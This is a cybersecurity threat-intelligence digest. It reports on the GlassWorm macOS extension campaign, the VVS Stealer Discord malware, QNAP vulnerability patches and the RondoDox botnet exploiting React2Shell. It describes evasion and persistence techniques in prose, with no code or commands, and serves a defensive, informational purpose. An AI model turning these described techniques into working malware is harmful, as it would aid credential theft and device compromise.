Cyware Daily Threat Intelligence, January 05, 2026

Mac developers are no longer safe from the supply chain threats that have plagued Windows users. The GlassWorm malware has launched a new wave of attacks targeting macOS systems through malicious VSCode and OpenVSX extensions. This sophisticated campaign delivers trojanized cryptocurrency wallet applications.

A new threat is being marketed on Telegram as the "ultimate stealer" for hijacking digital identities. VVS Stealer is a Python-based malware that specifically targets Discord credentials and tokens while evading detection with advanced obfuscation. Sold via subscription, this malware establishes persistence on victim machines and displays fake error messages.

A silent nine-month campaign has successfully conscripted thousands of devices into a new botnet named RondoDox. Exploiting the critical React2Shell vulnerability in Next.js and React Server Components, attackers have compromised over 90,000 instances, predominantly in the U.S. This massive operation has now entered an automated deployment phase.

Top Malware Reported in the Last 24 Hours

New GlassWorm malware wave targets Macs

A new wave of GlassWorm malware is specifically targeting macOS developers through malicious VSCode and OpenVSX extensions that deliver trojanized crypto wallet applications. This campaign marks a shift from previous attacks that focused on Windows systems. The malware employs AES-256-CBC–encrypted payloads embedded in JavaScript, executing its malicious logic after a 15-minute delay to evade detection. It utilizes AppleScript for persistence and LaunchAgents instead of modifying the Registry. Additionally, GlassWorm attempts to replace legitimate hardware wallet applications like Ledger Live and Trezor Suite with compromised versions, although this feature is currently malfunctioning. Despite the increased defenses against it, the malware continues to steal credentials and sensitive data, including Keychain passwords, and has recorded over 33,000 installations, with figures that may be artificially inflated to enhance trustworthiness.

New VVS Stealer malware targets Discord accounts

Cybersecurity researchers have identified a new Python-based malware known as VVS Stealer, which specifically targets Discord accounts by harvesting credentials and tokens. This malware, advertised on Telegram as the "ultimate stealer," utilizes obfuscation techniques through Pyarmor to evade detection and analysis. Priced affordably, it can be purchased via various subscription tiers. Once installed, VVS Stealer establishes persistence by adding itself to the Windows Startup folder and displays fake error messages to trick users into restarting their computers. It is capable of stealing a wide range of data, including Discord tokens, browser information, and screenshots. Additionally, the malware can perform Discord injection attacks to hijack active sessions by downloading a malicious JavaScript payload from a remote server. 

Top Vulnerabilities Reported in the Last 24 Hours

QNAP patches critical security vulnerabilities

QNAP has addressed critical vulnerabilities in its network-attached storage systems, including high-severity SQL injection and path traversal flaws. The SQL injection vulnerability, identified as CVE-2025-59387, affects the Multi-Application Recovery Service (MARS), allowing attackers to execute unauthorized commands. This issue has been resolved in versions 1.2.1.1686 and later, now known as HDP for WordPress. Similarly, the path traversal flaw in Qfiling (CVE-2025-59384) permits unauthorized access to sensitive files and has been patched in version 3.13.1 and beyond. Additionally, a lower-severity path traversal vulnerability was found in Qfinder Pro, Qsync, and QVPN Device Client for macOS. QNAP also fixed vulnerabilities in its License Center, including an out-of-bounds read and a buffer overflow, ensuring enhanced security across its software offerings.

RondoDox botnet exploits React2Shell

A persistent nine-month campaign has targeted IoT devices and web applications, forming a botnet known as RondoDox. This campaign exploits the React2Shell vulnerability (CVE-2025-55182), a critical flaw in React Server Components and Next.js that allows unauthenticated remote code execution. As of December 2025, approximately 90,300 instances remain vulnerable, predominantly in the U.S. RondoDox has expanded its reach by incorporating additional vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. The campaign progressed through three phases: initial reconnaissance and scanning, mass probing of web applications and IoT devices, and automated large-scale deployments. In recent attacks, threat actors have targeted vulnerable Next.js servers, deploying cryptocurrency miners and variants of the Mirai botnet while actively eliminating competing malware.